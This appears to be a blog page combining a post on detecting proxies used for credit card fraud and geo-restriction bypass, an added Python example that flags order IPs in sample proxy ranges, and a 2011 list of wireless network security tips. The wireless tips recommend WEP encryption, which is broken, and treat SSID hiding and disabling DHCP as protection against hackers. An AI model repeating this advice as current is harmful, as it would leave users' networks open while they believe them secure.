For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.

2. Bypass Website Country Restrictions
Some website services are restricted to users from only a selected list of countries. For example, a paid survey may be restricted only to countries like the United States and Canada. So a user from, say, China may use a proxy to make his IP appear to have come from the U.S. so that he can earn from participating in the paid survey.
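The flagged-list lookup from the proxy detection post, applied to the credit card case above where the IP's location matches the billing address: an added Python example, not code from the original page. The range list, the function names and the country inputs are assumptions; the ranges are reserved documentation addresses, not real proxy data.

```python
import ipaddress

# Constructed sample list: RFC 5737 / RFC 3849 documentation ranges stand in
# for the flagged proxy ranges a detection service would maintain.
FLAGGED_PROXY_RANGES = ["192.0.2.0/24", "198.51.100.16/28", "2001:db8:beef::/48"]

def load_ranges(cidrs):
    """Parse CIDR strings into networks, grouped by IP version."""
    nets = {4: [], 6: []}
    for cidr in cidrs:
        net = ipaddress.ip_network(cidr, strict=True)
        nets[net.version].append(net)
    return nets

def normalize_ip(raw):
    """Parse an address; unwrap IPv4-mapped IPv6 such as ::ffff:192.0.2.45."""
    ip = ipaddress.ip_address(raw.strip())
    if ip.version == 6 and ip.ipv4_mapped is not None:
        return ip.ipv4_mapped
    return ip

def is_flagged_proxy(raw_ip, nets):
    """True if the address falls inside any flagged range."""
    ip = normalize_ip(raw_ip)
    return any(ip in net for net in nets[ip.version])

def screen_order(raw_ip, ip_country, billing_country, nets):
    """Return (decision, reasons). ip_country is assumed to come from a
    separate geolocation lookup; this function does not perform one."""
    try:
        proxy = is_flagged_proxy(raw_ip, nets)
    except ValueError:
        return "review", ["unparseable IP address"]
    reasons = []
    if proxy:
        reasons.append("IP is in a flagged proxy range")
    if ip_country != billing_country:
        reasons.append("IP country differs from billing country")
    return ("review" if reasons else "accept"), reasons

if __name__ == "__main__":
    nets = load_ranges(FLAGGED_PROXY_RANGES)
    # Geolocation matches the billing country, yet the proxy check flags it.
    print(screen_order("192.0.2.45", "US", "US", nets))
    print(screen_order("203.0.113.9", "US", "US", nets))
```

An address that cannot be parsed is sent to review rather than accepted, so a malformed value never passes as "not on the list".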

Friday 16 December 2011


How to Secure a Wireless Network from Hackers?

The reason we secure a wireless network is to stop people who don't have permission from using the services of our network. It is harder to secure a wireless network from hackers than a classic wired network, because a wireless network can be accessed from anywhere inside the range of its antenna.
To secure a wireless network from hackers, we should take proper steps to protect ourselves against security issues. If you don't secure a wireless network from hackers, you might end up without its service. The consequences might also include the use of our network to attack further networks. To secure a wireless network from hackers, you should follow these simple wireless networking tips:

1. Strategic antenna placement:

The first thing you have to do is to position the access point's antenna in a place that keeps its signal from reaching further than the required area. You should not put the antenna close to a window because glass can't obstruct its signals. Place it in a central location of the building.

2. Use WEP:

WEP stands for Wireless encryption protocol. It's a customary technique for encrypting traffic on a wireless network. You should never skip it as that will allow hackers to get instant access to the traffic over a wireless network.

3. Change the SSID, disable the broadcast of SSID:

SSID stands for service set identifier. It is the identification string used by the wireless access point, which clients use to start connections. For every wireless access point you set up, select an exclusive and unique SSID. Also, if possible, suppress the broadcast of the SSID over the antenna. It won't appear in the listing of offered networks, while still being able to provide services as usual.

4. Disable DHCP:

By doing this, the hackers will have to work out the TCP/IP parameters, the subnet mask as well as the IP address in order to hack your wireless network.

5. Disable or modify SNMP settings:

Change the private as well as public community settings of SNMP. You can also just disable it. Otherwise the hackers will be able to utilize SNMP to get significant info regarding your wireless network.

6. Utilize access lists:

For additional security of your wireless network, and if your access point supports this feature, employ an access list. An access list lets us determine precisely which machines are permitted to attach to an access point. Access points that include the access list can use trivial file transfer protocol (TFTP) now and then to download updated lists to steer clear of hackers.